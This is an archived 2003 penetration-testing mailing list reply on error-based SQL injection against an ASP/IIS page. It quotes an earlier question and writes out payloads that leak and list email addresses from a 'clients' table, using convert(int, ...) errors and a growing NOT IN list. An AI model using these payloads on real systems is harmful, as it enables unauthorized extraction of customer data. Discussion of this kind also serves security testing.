Penetration Testing mailing list archives
Re: SQL injection - get more values
From: Thaidn <thaidn () idealscript com>
Date: Thu, 13 Feb 2003 02:05:07 +0700
Hello, Daniel Exactly, you can use "not in" with convert. 'convert(int,(select email from clients where email not in('anon () isp com'))) --> return the next email value in table clients, for example daniel () isp com, and go on submitting 'convert(int,(select email from clients where email not in('anon () isp com','daniel () isp com))), you will get all values in table clients. note: this only works in ASP/IIS, not work in CFM application because CFM escapes all " ' " in the query string, when I replace " ' " by " '' ", sometimes it works but not always. hehe, sorry for my english :D. Hope this helpful. On Thursday 13 February 2003 12:48 am, Daniel Savi wrote:
Hi :) i'm trying to get some info from clients table and email field.... i try this param into gubpage.asp?=... ') union select sum(email) from clients-- and got error about all queries needed...so, i tryed to solve with ') union select sum(email),1,1,1.... from clients-- until i get: operand type clash: text is incompatible with int i found this answer into this forum (thanks :)), was: ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b ' i got this: Syntax error converting the varchar value 'anon () isp com' to a column of data type int Now, my problem: How can i get other e-mail from table knowing one valid value? i try this ' %2b convert(int, (SELECT email FROM clients WHERE email'anon () isp com')) %2b 'but no success i think i can use NOT iN, but not sure how to use with convert... Any tip are welcome! Thanks --------------------------------------------------------------------------- - This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- SQL injection - get more values Daniel Savi (Feb 12)
- RE: SQL injection - get more values Panos Dimitriou (Feb 12)
- RE: SQL injection - get more values Cesar (Feb 12)
- Re: SQL injection - get more values Thaidn (Feb 13)
- Re: SQL injection - get more values Thaidn (Feb 12)
- Re: SQL injection - get more values Kevin Spett (Feb 13)
- Re: SQL injection - get more values Kevin Spett (Feb 12)
- <Possible follow-ups>
- RE: SQL injection - get more values Brass, Phil (ISS Atlanta) (Feb 12)
- RE: SQL injection - get more values Panos Dimitriou (Feb 12)